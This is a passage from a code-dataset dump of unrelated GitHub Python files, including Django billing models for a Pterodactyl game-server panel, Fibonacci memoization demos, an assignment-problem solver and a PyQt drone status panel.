1\n","repo_name":"xzjh/OJ_LeetCode","sub_path":"move-zeroes.py","file_name":"move-zeroes.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36797885388","text":"from typing_extensions import Required\nfrom django.contrib import admin\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom .pterodactyl import Pterodactyl\nimport json\nfrom . 
import notify\nfrom django.utils import timezone\n\nfrom BillDash import pterodactyl\n\npterodactyl = Pterodactyl(\n json.load(open(\"secrets.json\"))[\"pterodactyl_token\"],\n json.load(open(\"secrets.json\"))[\"pterodactyl_url\"],\n)\n\n# Create your models here.\nclass Customer(models.Model):\n user = models.OneToOneField(\n User, null=True, blank=True, on_delete=models.PROTECT, default=None\n )\n name = models.CharField(max_length=25)\n ptero_id = models.IntegerField(blank=True, null=True, default=None)\n\n def __str__(self) -> str:\n return self.name\n\n def email(self):\n return self.user.email\n\n def save(self, *args) -> None:\n if self.ptero_id is not None:\n return super().save(*args)\n res = pterodactyl.create_new_user(\n self.user.email,\n self.user.username,\n self.user.first_name,\n self.user.last_name,\n )\n if res is None:\n return print(\"Error creating customer\")\n self.ptero_id = int(res[\"attributes\"][\"id\"])\n return super().save(*args)\n\n def delete(self, *args):\n if pterodactyl.delete_user(self.ptero_id):\n return super().delete(*args)\n return print(\"Error deleting customer\")\n\n\nclass Bill(models.Model):\n bill_number = models.AutoField(primary_key=True)\n server = models.ForeignKey(\"Server\", on_delete=models.SET_NULL, null=True)\n currency = models.CharField(max_length=3)\n amount = models.DecimalField(max_digits=10, decimal_places=2, default=0)\n creation_date = models.DateTimeField(auto_now_add=True)\n due_date = models.DateTimeField()\n paid = models.BooleanField(default=False)\n\n def __str__(self) -> str:\n try:\n return f\"{self.server.customer} - {self.due_date.isoformat()}\"\n except:\n return f\"{self.server} - {self.due_date.isoformat()}\"\n\n def save(self, *args) -> None:\n if (not self._state.adding) and self.paid:\n self.server.next_payment_date += timezone.timedelta(days=30)\n if self.server.suspended:\n self.server.suspended = False\n self.server.save()\n notify.bill_paid(self)\n return super().save(*args)\n if self.amount > 0:\n notify.new_bill(self)\n return super().save(*args)\n self.amount = self.server.plan.price\n notify.new_bill(self)\n return super().save(*args)\n \n def delete(self, *args):\n notify.bill_delete(self)\n return super().delete(*args)\n\n\nclass Location(models.Model):\n name = models.CharField(max_length=25)\n ptero_id = models.IntegerField(blank=True, null=True, default=None)\n\n def __str__(self) -> str:\n return self.name\n\n\nclass Plan(models.Model):\n ram = models.IntegerField(default=0)\n cpu = models.IntegerField(default=0)\n disk = models.IntegerField(default=0)\n price = models.DecimalField(max_digits=10, decimal_places=2)\n name = models.CharField(max_length=25)\n network_allocations = models.IntegerField(default=1)\n backups = models.IntegerField(default=0)\n databases = models.IntegerField(default=0)\n location = models.ForeignKey(Location, on_delete=models.PROTECT, default=None)\n dedicated_ip = models.BooleanField(default=False)\n\n def __str__(self):\n return self.name\n\n\nclass ServerSoftware(models.Model):\n name = models.CharField(max_length=25)\n game_name = models.CharField(max_length=25)\n ptero_nest_id = models.IntegerField(blank=False, null=False)\n ptero_egg_id = models.IntegerField(blank=False, null=False)\n docker_image = models.CharField(max_length=25, blank=True, null=True)\n startup_command = models.CharField(max_length=1000, blank=True, null=True)\n environment = models.CharField(max_length=1000, blank=True, null=True)\n\n def __str__(self) -> str:\n return f\"{self.game_name} - 
{self.name}\"\n\n def save(self, *args) -> None:\n resp = pterodactyl.get_egg_info(self.ptero_nest_id, self.ptero_egg_id)\n if not resp:\n return \"Error getting egg info\"\n self.docker_image = resp[\"attributes\"][\"docker_image\"]\n env = {}\n for var in resp[\"attributes\"][\"relationships\"][\"variables\"][\"data\"]:\n env[f\"{var['attributes']['env_variable']}\"] = var[\"attributes\"][\n \"default_value\"\n ]\n self.environment = json.dumps(env)\n self.startup_command = resp[\"attributes\"][\"startup\"]\n return super().save(*args)\n\n\nclass Server(models.Model):\n server_id = models.IntegerField()\n server_id_hex = models.CharField(max_length=10, blank=True, null=True, default=None)\n customer = models.ForeignKey(Customer, on_delete=models.PROTECT)\n creation_date = models.TimeField(auto_now=True)\n plan = models.ForeignKey(Plan, on_delete=models.PROTECT)\n next_payment_date = models.DateTimeField(null=True, blank=True)\n server_software = models.ForeignKey(\n ServerSoftware, on_delete=models.PROTECT, default=None\n )\n suspended = models.BooleanField(default=False)\n\n def __str__(self):\n return self.server_id_hex\n\n def name(self):\n res = pterodactyl.get_server_info(self.server_id)\n if not res:\n return \"Error getting server info\"\n return res[\"attributes\"][\"name\"]\n\n def save(self, *args):\n if not self._state.adding:\n if not self.suspended:\n notify.unsuspend_server(self)\n pterodactyl.unsuspend_server(self.server_id)\n if self.suspended:\n notify.suspend_server(self)\n pterodactyl.suspend_server(self.server_id)\n return super().save(*args)\n if self.server_id is not None:\n self.server_id_hex = pterodactyl.get_server_info(self.server_id)[\n \"attributes\"\n ][\"identifier\"]\n return super().save(*args)\n specs = {\n \"name\": f\"{self.customer.name}-{self.plan.name}\",\n \"user\": self.customer.ptero_id,\n \"egg\": self.server_software.ptero_egg_id,\n \"docker_image\": self.server_software.docker_image,\n \"startup\": self.server_software.startup_command,\n \"environment\": json.loads(self.server_software.environment),\n \"limits\": {\n \"memory\": self.plan.ram,\n \"swap\": -1,\n \"disk\": self.plan.disk,\n \"io\": 500,\n \"cpu\": self.plan.cpu,\n },\n \"feature_limits\": {\n \"databases\": self.plan.databases,\n \"backups\": self.plan.backups,\n \"allocations\": self.plan.network_allocations,\n },\n \"deploy\": {\n \"location\": [self.plan.location.ptero_id],\n \"dedicated_ip\": self.plan.dedicated_ip,\n },\n }\n res = pterodactyl.create_new_server(\n specs[\"name\"],\n specs[\"user\"],\n specs[\"egg\"],\n specs[\"docker_image\"],\n specs[\"startup\"],\n specs[\"environment\"],\n specs[\"limits\"],\n specs[\"feature_limits\"],\n specs[\"deploy\"][\"location\"],\n specs[\"deploy\"][\"dedicated_ip\"],\n )\n if res == None:\n return print(\"Error creating server\")\n self.server_id = res[\"attributes\"][\"id\"]\n self.server_id_hex = res[\"attributes\"][\"identifier\"]\n notify.new_server(self)\n return super().save(*args)\n\n def delete(self, *args):\n pterodactyl.delete_server(self.server_id)\n notify.delete_server(self)\n return super().delete(*args)\n","repo_name":"vachanmn123/IvyBill","sub_path":"BillDash/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"16609992223","text":"import random\nimport codecs\n\nletters = {\n \"Left\": \"йцуфывячс\",\n \"Right\": \"нгшролть\",\n \"Forward\": \"щзхъджэбю\",\n \"Backward\": 
\"кеапми\",\n}\n\nletters_encoding = {\"й\":1, \"ц\":1, \"у\":1, \"ф\":1, \"ы\":1, \"в\":1, \"ы\":1,\"в\":1, \"я\":1,\"ч\":1, \"с\":1,\"к\":2,\"е\":2, \"ё\":2, \"а\":2,\"п\":2,\"м\":2,\"и\":2,\n\"н\":3,\"г\":3,\"ш\":3,\"р\":3,\"о\":3,\"л\":3,\"т\":3,\"ь\":3, \"-\":3, \"щ\":4,\"з\":4,\"х\":4,\"ъ\":4,\"д\":4,\"ж\":4,\"э\":4,\"б\":4,\"ю\":4}\n\ndef encode_word(word: str) -> str: \n numeral_performance = \"\"\n word = word.rstrip()\n for i in word:\n numeral_performance += str(letters_encoding[i])\n return numeral_performance\n\ndef read_dict() -> dict:\n with codecs.open(\"word_rus.txt\", encoding='utf-8') as f:\n lines = f.readlines()\n d = {}\n for line in lines:\n line = line.strip()\n d[line] = encode_word(line)\n return d\n\nword = \"\"\npred1 = \"\"\npred2 = \"\"\ntext = \"\"\npdict = read_dict()\n\ndef search_word(numeric: int) -> list:\n global pdict\n output = []\n for item, value in pdict.items():\n if value.startswith(numeric):\n output.append(item)\n output = sorted(output, key=len)\n return output \n\ndef get_text(selection: str = \"\") -> str:\n global text\n if selection != \"\":\n text += f\"{selection} \"\n return text \n return text + word\n\ndef get_letter(motion: str) -> str: \n global letters\n group = letters[motion]\n letter = group[random.randint(0, len(group) - 1)]\n return letter\n\ndef get_word(letter: str) -> str:\n global word\n return word + letter\n\ndef get_predictions(letter: str = \"\") -> list:\n global word, pred1, pred2\n if letter == \"\":\n copy1 = pred1\n copy2 = pred2\n word = pred1 = pred2 = \"\"\n return [copy1, copy2]\n\n word += letter\n preds = search_word(encode_word(word))\n if len(preds) == 0:\n pred1 = word + letter\n pred2 = word + letter\n elif len(preds) == 1:\n pred1 = preds[0]\n pred2 = word + letter\n else:\n pred1 = preds[0]\n pred2 = preds[1]\n \n return [pred1, pred2]\n ","repo_name":"dmitriykara/Accelerometer","sub_path":"server/server/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5317361425","text":"from timer import timed\n\nprint(\"---fib-------\")\ndef fib(n):\n print('calc fib({0})'.format(n))\n return 1 if n < 3 else fib(n-1) + fib(n-2)\n\nfib(10)\n\nprint(\"---fib1-------\")\n\ndef fib1():\n cache = {1:1, 2:1}\n def calc_fib(n):\n if n not in cache:\n print('calc fib({0})'.format(n))\n cache[n] = calc_fib(n-1) + calc_fib(n-2)\n return cache[n]\n return calc_fib\n\ng = fib1()\ng(10)\n\nprint(\"---fib2-------\")\n\ndef memoize(fn):\n cache = dict()\n def inner(n):\n if n not in cache:\n print('calc fib({0})'.format(n))\n cache[n] = fn(n)\n return cache[n]\n return inner\n\n\n@memoize\ndef fib2(n):\n return 1 if n < 3 else fib2(n-1) + fib2(n-2)\n\nfib2(10)\nfib2(10)\n\n\nprint(\"---fib3-------\")\n\nfrom functools import lru_cache\n@lru_cache()\n@timed\ndef fib3(n):\n print('calc fib({0})'.format(n))\n return 1 if n < 3 else fib3(n-1) + fib3(n-2)\n\nfib3(10)\nfib3(10)\n\n\n","repo_name":"xta0/CodeBase","sub_path":"python/basics/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9148714980","text":"import time\n\nfrom e3pipe.__logging__ import logger\n\n\nHTML_HEADER = \\\n\"\"\"\n\n\n\n \n\n\n\n%s\n\n\n\n\n
    \n

    %s

    \n
    \n\n
    \n\"\"\"\n\nHTML_FOOTER = \\\n\"\"\"\n
    \n\n
    \nExtreme Energy Events (EEE) is powered by\ne3pipe version %s.
    \nThis page validates as\nHTML5 and \ncss level 3.
    \nGenerated on %s.\n
    \n\n\n\"\"\"\n\n\ndef htmlAttributes(**kwargs):\n \"\"\" Format a python dictionary as a collection of html attributes.\n \"\"\"\n return ' '.join('%s=\"%s\"' % item for item in kwargs.items())\n\ndef htmlTableHeader(*args, **kwargs):\n \"\"\" Format a list of arguments as a html table header.\n \"\"\"\n text = ''\n for arg in args:\n text += '' % arg\n text += ''\n return text\n\n\n\nclass E3HtmlOutputFile(file):\n\n \"\"\" Utility class for html output.\n \"\"\"\n\n DEFAULT_CSS_FILE_PATH = 'e3pipe.css'\n DEFAULT_TITLE = 'EEE Data Quality Monitoring'\n DEFAULT_HEADER_TEXT = 'EEE DQM run report'\n\n def __init__(self, filePath, **kwargs):\n \"\"\" Constructor.\n \"\"\"\n css = kwargs.get('css', self.DEFAULT_CSS_FILE_PATH)\n title = kwargs.get('title', self.DEFAULT_TITLE)\n header = kwargs.get('header', self.DEFAULT_HEADER_TEXT)\n logger.info('Opening output file %s...' % filePath)\n file.__init__(self, filePath, 'w')\n self.write(HTML_HEADER % (title, css, header))\n\n def section(self, title):\n \"\"\" Start a new section in the output file.\n \"\"\"\n self.write('\\n

    %s

    \\n' % title)\n\n def li(self, text, **kwargs):\n \"\"\"\n \"\"\"\n self.write('
  • %s
  • \\n' % (htmlAttributes(**kwargs), text))\n\n def image(self, filePath, **kwargs):\n \"\"\" Add an image to the output file.\n \"\"\"\n self.write('\\n' %\\\n (filePath, htmlAttributes(**kwargs), filePath))\n\n def close(self):\n \"\"\" Write the footer and close the file.\n \"\"\"\n from e3pipe.__version__ import TAG\n self.write(HTML_FOOTER %\\\n (TAG, time.strftime('%A, %B %d %Y at %H:%M (%z)')))\n file.close(self)\n","repo_name":"centrofermi/e3pipe","sub_path":"dqm/E3HtmlOutputFile.py","file_name":"E3HtmlOutputFile.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"72002762660","text":"# 154. Find Minimum in Rotated Sorted Array II\n\nclass Solution:\n def findMin(self, nums: List[int]) -> int:\n # 63 ms\t14.6 MB\n # return min(nums)\n\n # 59 ms\t14.9 MB\n min_num = nums[0]\n for i in range(len(nums) - 1):\n if nums[i+1] < nums[i]:\n min_num = nums[i+1]\n break\n return min_num\n ","repo_name":"YukiT1990/Leetcode","sub_path":"00372_FindMinimuminRotatedSortedArrayII(154).py","file_name":"00372_FindMinimuminRotatedSortedArrayII(154).py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37033176878","text":"import re\nimport _helpers\n\n\nclass EAPFileList:\n\n COLLECTIONS_FILE = 'collections.txt'\n EAP_FILE = 'eap_files.txt'\n URL_FOR_FILE = 'https://eap.bl.uk/archive-file/'\n URL_FOR_COLL = 'https://eap.bl.uk/collection/'\n\n def get_eap_list(self):\n with open(self.COLLECTIONS_FILE) as f:\n collections = f.read().splitlines()\n return collections\n\n def generate_download_list(self, collections):\n download_list = []\n for collection in collections:\n print('Now adding files from collection ' + collection + ' to download list...')\n converted_url = self.URL_FOR_FILE + collection.replace('/', '-')\n collection_conv_url = self.URL_FOR_COLL + collection.replace('/', '-')\n coll_exists, coll_content = _helpers.page_exists(collection_conv_url)\n if not coll_exists:\n print(collection + ' is not a collection')\n else:\n try:\n search_desc = coll_content.find(\"span\", class_='search-description').get_text()\n except AttributeError:\n print('No documents found in ' + collection_conv_url)\n continue\n total_results = re.search(\".*of(.*)results.*\", search_desc.replace(',', '')).group(1).strip()\n if not _helpers.page_exists(converted_url + '-' + total_results):\n print('This collection probably has sub-collections. 
Please use those instead')\n else:\n for i in range(1, int(total_results) + 1):\n download_list.append(collection.replace('-', '/') + '/' + str(i))\n return download_list\n\n def write_to_file(self, eap_link):\n with open(self.EAP_FILE, 'a') as f:\n for entry in eap_link:\n f.write(entry + '\\n')\n\n def run(self):\n collections = self.get_eap_list()\n if not collections:\n print('collections.txt is empty')\n else:\n self.write_to_file(self.generate_download_list(collections))\n\n\nif __name__ == '__main__':\n EAPFileList().run()\n","repo_name":"prachatos/eap2pdf","sub_path":"get_eap_entry.py","file_name":"get_eap_entry.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"39033358663","text":"from queue import PriorityQueue\n\ndef min_except(costs,assignment):\n out = float('inf')\n \n for job in range(len(costs)):\n if job in assignment: continue\n if costs[job] < out: out = costs[job]\n \n return out\n\ndef lowerbound(assignment,C):\n m = len(assignment)\n lb = 0\n for i in range(len(C)):\n if i < m: lb += C[i][assignment[i]]\n else: lb += min_except(C[i],assignment)\n return lb\n\n\ndef assign(assignment,job):\n if job in assignment: return None\n return assignment+[job]\n\ndef findAssignments(C):\n \"\"\"Best First Branch and Bound\"\"\"\n n = len(C)\n Q = PriorityQueue()\n start = (lowerbound([],C),[])\n Q.put(start)\n\n optimal = (float('inf'),[])\n\n while Q.qsize()>0:\n lb, assignment = Q.get()\n if lb > optimal[0]: continue\n\n if len(assignment) == n: \n if lb < optimal[0]: optimal = (lb,assignment)\n continue\n\n for job in range(n):\n new_assignment = assign(assignment,job)\n if new_assignment:\n lb= lowerbound(new_assignment,C)\n Q.put((lb,new_assignment))\n\n return optimal\n\nC = [\n [9,2,7,8],\n [6,4,3,7],\n [5,8,1,8],\n [7,6,9,4]\n ]\n\ncost,assignment = findAssignments(C)\n\nprint(f\"Optimal Solution:-\\nAssignment: {assignment}\\nCost: {cost}\")","repo_name":"nonkloq/dump","sub_path":"algs/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32932718417","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: DIYer22@github\n@mail: ylxx@live.com\nCreated on Fri Feb 15 20:20:59 2019\n\"\"\"\nfrom . 
import torch, hasnan\n\n\ndef pthnan(pth):\n dic = torch.load(pth, map_location=\"cpu\")\n from collections import OrderedDict\n\n def getOrderedDict(seq):\n if isinstance(seq, OrderedDict):\n return seq\n if isinstance(seq, dict):\n seq = list(seq.values())\n if not isinstance(seq, (tuple, list)):\n return None\n for s in seq:\n re = getOrderedDict(s)\n if re is not None:\n return re\n\n od = getOrderedDict(dic)\n tensor = list(od.values())[-1]\n print(\n '\\n\"%s\"\\n\\nHas nan: %s\\n'\n % (\"\\x1b[36m%s\\x1b[0m\" % tensor[..., :10], \"\\x1b[31m%s\\x1b[0m\" % hasnan(tensor))\n )\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(\n description=\"\"\"\n detect a pth file \"Does it has nan?\" \"\"\"\n )\n parser.add_argument(\n \"pth\",\n default=\"/home/dl/github/maskrcnn/output/mix_11/model_final.pth\",\n type=str,\n )\n args = parser.parse_args()\n\n pthnan(pth=args.pth)\n","repo_name":"DIYer22/boxx","sub_path":"boxx/ylth/pthnan.py","file_name":"pthnan.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":466,"dataset":"github-code","pt":"35"} +{"seq_id":"35516127258","text":"\r\nfrom PyQt4 import QtCore, QtGui\r\nfrom model.VehicleEventDispatcher import VehicleEventDispatcher\r\nfrom model.VehicleConfigImageMap import VEHICLE_CONFIG_FILE_MAP\r\nfrom ui.subpanel.BasePanelController import BasePanelController\r\nfrom utilities.specialwidgets.BarGauge import BarGauge\r\nfrom ui.subpanel.vehicleoverallstatus.VehicleOverallStatusPanel import Ui_VehicleOverallStatusPanel\r\nimport math\r\nfrom ui.UIEventDispatcher import UIEventDispatcher\r\n\r\nclass VehicleOverallStatusController(QtGui.QWidget, BasePanelController):\r\n \r\n MOTORS_GAUGE_POSITION = {'Quad +' : ((182,22), (300,140), (182,255), (62,140)),\r\n 'Quad X' : ((80,35), (280,35), (80,240), (280,240)),\r\n 'Quad Y4' : ((66,23), (222,23), (145,260), (300,260)),\r\n 'Tri' : ((330,240), (80,35), (285,35), (182,240)),\r\n 'Hex +' : ((235,30), (390,100), (390,275),(235,350), (75,275), (75,100)),\r\n 'Hex X' : ((150,30), (320,30), (390,190), (320,350), (150,350), (75,190)),\r\n 'Hex Y6' : ((50,45), (170,45), (170,340), (295,45), (420,45), (300,340)),\r\n 'Octo X8' : ((192,27), (325,190), (192,350), (55,190),(275,27), (410,190), (275,350), (140,190)),\r\n 'Octo X' : ((165,25), (295,25), (385,130), (385,260), (295,350), (165,350), (70,260), (70,130)),\r\n 'Octo X+' : ((235,30), (360,65), (395,185), (360,315), (235,350), (110,315), (75,185), (110,65)) }\r\n\r\n \r\n def __init__(self, vehicle_event_dispatcher, ui_event_dispatcher):\r\n QtGui.QWidget.__init__(self)\r\n BasePanelController.__init__(self)\r\n self.ui = Ui_VehicleOverallStatusPanel()\r\n self.ui.setupUi(self)\r\n \r\n self._protocol_handler = None\r\n self._channel_count = 0\r\n self._flight_config = 'Quad +'\r\n self._channel_bar_gauge_array = []\r\n self._channels_label_array_text = ['Mode']\r\n self._channels_label_array_object = []\r\n self._motor_gauge_pixel_width = 25.0\r\n self._label_pixel_height = 25\r\n self._window_height = 400\r\n \r\n self._motors_count = 4\r\n self._vehicle_roll = 0.0\r\n self._vehicle_pitch = 0.0\r\n \r\n self._receiver_roll = 0\r\n self._receiver_pitch = 0\r\n self._receiver_yaw = 0\r\n self._receiver_throttle = 0\r\n\r\n horizon_background_image = QtGui.QPixmap('./resources/artificialHorizonBackGround.svg')\r\n self._horizon_background_image = QtGui.QGraphicsPixmapItem(horizon_background_image)\r\n \r\n horizon_dial_image = 
QtGui.QPixmap('./resources/artificialHorizonDial.svg')\r\n horizon_dial_item = QtGui.QGraphicsPixmapItem(horizon_dial_image)\r\n horizon_dial_item.setPos(QtCore.QPointF(100.0, 390.0))\r\n \r\n horizon_compass_background = QtGui.QPixmap('./resources/artificialHorizonCompassBackGround.svg')\r\n horizon_compass_background_item = QtGui.QGraphicsPixmapItem(horizon_compass_background)\r\n horizon_compass_background_item.setPos(QtCore.QPointF(100.0, 390.0))\r\n \r\n horizon_compass = QtGui.QPixmap('./resources/artificialHorizonCompass.svg')\r\n self._horizon_compass_item = QtGui.QGraphicsPixmapItem(horizon_compass)\r\n self._horizon_compass_item.setPos(QtCore.QPointF(100.0, 390.0)) \r\n \r\n horizon_scene = QtGui.QGraphicsScene()\r\n horizon_scene.addItem(self._horizon_background_image)\r\n horizon_scene.addItem(horizon_dial_item)\r\n horizon_scene.addItem(horizon_compass_background_item)\r\n horizon_scene.addItem(self._horizon_compass_item)\r\n\r\n # Setup text info in artificial horizon_background_image\r\n rollLabel = horizon_scene.addText('Roll:')\r\n rollLabel.setDefaultTextColor(QtCore.Qt.white)\r\n rollLabel.setPos(102, 420)\r\n self.roll = horizon_scene.addText('0.0')\r\n self.roll.setDefaultTextColor(QtCore.Qt.white)\r\n self.roll.setPos(125, 420)\r\n pitchLabel = horizon_scene.addText('Pitch:')\r\n pitchLabel.setDefaultTextColor(QtCore.Qt.white)\r\n pitchLabel.setPos(102, 405)\r\n self.pitch = horizon_scene.addText('0.0')\r\n self.pitch.setDefaultTextColor(QtCore.Qt.white)\r\n self.pitch.setPos(132, 405)\r\n headingLabel = horizon_scene.addText('Heading:')\r\n headingLabel.setDefaultTextColor(QtCore.Qt.white)\r\n headingLabel.setPos(102, 390)\r\n self.heading = horizon_scene.addText('0.0')\r\n self.heading.setDefaultTextColor(QtCore.Qt.white)\r\n self.heading.setPos(147, 390)\r\n altitudeLabel = horizon_scene.addText('Altitude:')\r\n altitudeLabel.setDefaultTextColor(QtCore.Qt.white)\r\n altitudeLabel.setPos(320, 390)\r\n self.altitude = horizon_scene.addText('000.0')\r\n self.altitude.setDefaultTextColor(QtCore.Qt.white)\r\n self.altitude.setPos(363, 390)\r\n altHoldLabel = horizon_scene.addText('Alt Hold:')\r\n altHoldLabel.setDefaultTextColor(QtCore.Qt.white)\r\n altHoldLabel.setPos(331, 405)\r\n self.altitudeHold = horizon_scene.addText('Off')\r\n self.altitudeHold.setDefaultTextColor(QtCore.Qt.red)\r\n self.altitudeHold.setPos(374, 405)\r\n armLabel = horizon_scene.addText('Motors:')\r\n armLabel.setDefaultTextColor(QtCore.Qt.white)\r\n armLabel.setPos(102, 653)\r\n self.motorArm = horizon_scene.addText('Not Armed')\r\n self.motorArm.setDefaultTextColor(QtCore.Qt.red)\r\n self.motorArm.setPos(102, 668)\r\n battLabel = horizon_scene.addText('Batt:')\r\n battLabel.setDefaultTextColor(QtCore.Qt.white)\r\n battLabel.setPos(330, 653)\r\n self.batteryPower = horizon_scene.addText('0.000')\r\n self.batteryPower.setDefaultTextColor(QtCore.Qt.white)\r\n self.batteryPower.setPos(357, 653)\r\n modeLabel = horizon_scene.addText('Mode:')\r\n modeLabel.setDefaultTextColor(QtCore.Qt.white)\r\n modeLabel.setPos(330, 668)\r\n self.flightMode = horizon_scene.addText('Acro')\r\n self.flightMode.setDefaultTextColor(QtCore.Qt.yellow)\r\n self.flightMode.setPos(362, 668)\r\n self.ui.artificialHorizon.setScene(horizon_scene)\r\n \r\n # Setup left transmitter stick\r\n leftStickScene = QtGui.QGraphicsScene()\r\n leftStickBackground = QtGui.QPixmap('./resources/TxDial.png')\r\n leftStickItem = QtGui.QGraphicsPixmapItem(leftStickBackground)\r\n leftStickScene.addItem(leftStickItem)\r\n self.leftStick = 
QtGui.QGraphicsEllipseItem(QtCore.QRectF(75, 75, 30, 30))\r\n self.leftStick.setPen(QtGui.QPen(QtGui.QBrush(QtCore.Qt.black, QtCore.Qt.SolidPattern), 2))\r\n self.leftStick.setBrush(QtGui.QBrush(QtCore.Qt.blue, QtCore.Qt.SolidPattern))\r\n leftStickScene.addItem(self.leftStick)\r\n self.ui.leftTransmitter.setScene(leftStickScene)\r\n \r\n # Setup right transmitter stick\r\n rightStickScene = QtGui.QGraphicsScene()\r\n rightStickBackground = QtGui.QPixmap('./resources/TxDial.png')\r\n rightStickItem = QtGui.QGraphicsPixmapItem(rightStickBackground)\r\n rightStickScene.addItem(rightStickItem)\r\n self.rightStick = QtGui.QGraphicsEllipseItem(QtCore.QRectF(75, 75, 30, 30))\r\n self.rightStick.setPen(QtGui.QPen(QtGui.QBrush(QtCore.Qt.black, QtCore.Qt.SolidPattern), 2))\r\n self.rightStick.setBrush(QtGui.QBrush(QtCore.Qt.blue, QtCore.Qt.SolidPattern))\r\n rightStickScene.addItem(self.rightStick)\r\n self.ui.rightTransmitter.setScene(rightStickScene)\r\n \r\n vehicle_event_dispatcher.register(self._flight_config_received, VehicleEventDispatcher.FLIGHT_CONFIG_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_channel_count_received, VehicleEventDispatcher.RECEIVER_NB_CHANNEL_EVENT)\r\n vehicle_event_dispatcher.register(self._motors_count_received, VehicleEventDispatcher.NUMBER_MOTORS_EVENT)\r\n vehicle_event_dispatcher.register(self._motor_armed_event, VehicleEventDispatcher.MOTOR_ARMED_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._vehicle_roll_event, VehicleEventDispatcher.VEHICLE_ROLL_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._vehicle_pitch_event, VehicleEventDispatcher.VEHICLE_PITCH_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._vehicle_heading_event, VehicleEventDispatcher.VEHICLE_HEADING_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._vehicle_altitude_hold_state_event, VehicleEventDispatcher.ALTITUDE_HOLD_STATE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._vehicle_altitude_event, VehicleEventDispatcher.VEHICLE_ALTITUDE_PROPERTY_EVENT)\r\n \r\n vehicle_event_dispatcher.register(self._receiver_roll_event, VehicleEventDispatcher.RECEIVER_ROLL_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_pitch_event, VehicleEventDispatcher.RECEIVER_PITCH_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_yaw_event, VehicleEventDispatcher.RECEIVER_YAW_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_throttle_event, VehicleEventDispatcher.RECEIVER_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_mode_event, VehicleEventDispatcher.RECEIVER_MODE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux1_event, VehicleEventDispatcher.RECEIVER_AUX1_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux2_event, VehicleEventDispatcher.RECEIVER_AUX2_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux3_event, VehicleEventDispatcher.RECEIVER_AUX3_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux4_event, VehicleEventDispatcher.RECEIVER_AUX4_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux5_event, VehicleEventDispatcher.RECEIVER_AUX5_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux6_event, VehicleEventDispatcher.RECEIVER_AUX6_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._receiver_aux7_event, VehicleEventDispatcher.RECEIVER_AUX7_PROPERTY_EVENT)\r\n \r\n vehicle_event_dispatcher.register(self._motor1_throttle_event, 
VehicleEventDispatcher.MOTOR1_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor2_throttle_event, VehicleEventDispatcher.MOTOR2_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor3_throttle_event, VehicleEventDispatcher.MOTOR3_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor4_throttle_event, VehicleEventDispatcher.MOTOR4_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor5_throttle_event, VehicleEventDispatcher.MOTOR5_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor6_throttle_event, VehicleEventDispatcher.MOTOR6_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor7_throttle_event, VehicleEventDispatcher.MOTOR7_THROTTLE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._motor8_throttle_event, VehicleEventDispatcher.MOTOR8_THROTTLE_PROPERTY_EVENT)\r\n \r\n vehicle_event_dispatcher.register(self._flight_mode_event, VehicleEventDispatcher.FLIGHT_MODE_PROPERTY_EVENT)\r\n vehicle_event_dispatcher.register(self._battery_voltage_received, VehicleEventDispatcher.BATTERY_VOLTAGE_PROPERTY_EVENT)\r\n \r\n ui_event_dispatcher.register(self._protocol_handler_changed_event, UIEventDispatcher.PROTOCOL_HANDLER_EVENT)\r\n \r\n def _protocol_handler_changed_event(self, event, protocol_handler):\r\n self._protocol_handler = protocol_handler;\r\n \r\n def _flight_config_received(self, event, 